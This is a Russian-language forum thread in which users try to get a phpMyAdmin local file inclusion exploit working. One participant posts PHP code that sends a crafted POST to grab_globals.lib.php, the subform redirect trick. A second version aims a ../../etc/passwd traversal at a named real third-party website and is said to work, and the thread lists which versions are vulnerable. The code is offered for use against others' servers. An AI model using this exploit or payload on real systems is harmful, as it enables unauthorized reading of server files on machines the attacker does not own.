Здрасте! Вот тут наткнулся на phpMyAdmin 2.6.1 Нашел сплойтик, для него _http://securityvulns.ru/Jdocument894.html Заюзал на локалхосте, но походу ручки то кривые. Пишет. Запросы делал вида C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/fuck.php Предварительно создав fuck.php Я наверно непрально пишу файл инклуда. Подскажите как будет верно?
ну если я прально понял, то просто localhost, не получится, а попробывал C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/config.inc.php тоже самое, наверно я непрально пишу путь к инклуду, пробывал www/htdocs/php/config.inc.php htdocs/php/config.inc.php php/config.inc.php config.inc.php толка нет(
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin) во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
Спасибо огромное! Буду ждать. Что в папке php я уверен) http://localhost/php/index.php C:\www\htdocs\php Может у меня криво настроенный апач? Оо и по каким-то причинам ему не нравится POST?
посмотрел я код grab_globals.lib.php нет там ничего, такого, что б могло позволять читать или инклюдить файлы (там вобще практически ничего нет) вот код на пхп, помоему правильно: PHP: <?php $host="localhost"; $fl="../Credits"; $dira="/Tools/phpmyadmin/"; $filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1"; $leng=strlen($filo); $qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n"; $qv=$qv.$filo; $fp = fsockopen ($host, 80); fputs ($fp, $qv); while (!feof($fp)) { echo fgets($fp); } ?> $host - хост $fl - файл для инклюда $dira - папка с phpmyadmin но этот сплоит у меня ничего не делает, т.к. еще раз говорю в grab_globals.lib.php ничего такого нет... у меня phpMyAdmin 2.6.1
да... все дело в версии например вот это работает: PHP: <?php $host="www.bafonline.net.nz"; $fl="../../../../../../../../../../etc/passwd"; $dira="/sql/"; $filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1"; $leng=strlen($filo); $qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n"; $qv=$qv.$filo; echo $qv; $fp = fsockopen ($host, 80); fputs ($fp, $qv); while (!feof($fp)) { echo fgets($fp); } ?> уязвимы версии 2.6.4 и 2.6.4-pl1, 2.6.4-pl2 уже не уязвима,более ранние версии как выяснилось тоже не уязвимы вобщем сплоит чисто инклюдит файлы, читать пхп файлы не получится, вобщем все прелести и недостатки локального инклюда... в $fl записывается имя файла с относительным путем, т.е. относительно libraries